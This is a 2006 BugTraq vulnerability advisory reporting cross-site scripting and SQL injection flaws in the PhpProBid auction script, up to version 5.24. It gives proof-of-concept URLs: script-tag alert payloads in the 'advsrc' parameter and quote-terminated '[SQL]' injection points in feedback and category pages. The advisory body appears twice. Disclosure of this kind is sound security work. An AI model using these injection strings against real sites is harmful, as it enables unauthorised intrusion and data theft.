BugTraq
Back to list
|
Post reply
Phpprobid <= 5.24 XSS SQL injection Vulnerability
Jul 25 2006 05:15PM
securityconnection gmail com
Phpprobid 5.24
http://www.phpprobid.com
--------------------------
Cross Site Scripting (XSS)
--------------------------
http://target.xx/auctionsearch.php?advsrc="<script>alert(/EllipsisSecuri
tyTest/)</script>
http://target.xx/auctionsearch.php?start=1&advsrc="><script>alert(/Ellip
sisSecurityTest/)</script>
-------------
SQL injection
-------------
http://target.xx/viewfeedback.php?view=1'[SQL]
http://target.xx/viewfeedback.php?view=all&start=1'[SQL]
http://target.xx/categories.php?parent=&start=&orderField=itemname&order
Type=1'[SQL]
-----------------
Ellipsis Security
http://www.ellsec.org
[ reply ]
Privacy Statement
Copyright 2010, SecurityFocus
http://www.phpprobid.com
--------------------------
Cross Site Scripting (XSS)
--------------------------
http://target.xx/auctionsearch.php?advsrc="<script>alert(/EllipsisSecuri
tyTest/)</script>
http://target.xx/auctionsearch.php?start=1&advsrc="><script>alert(/Ellip
sisSecurityTest/)</script>
-------------
SQL injection
-------------
http://target.xx/viewfeedback.php?view=1'[SQL]
http://target.xx/viewfeedback.php?view=all&start=1'[SQL]
http://target.xx/categories.php?parent=&start=&orderField=itemname&order
Type=1'[SQL]
-----------------
Ellipsis Security
http://www.ellsec.org
[ reply ]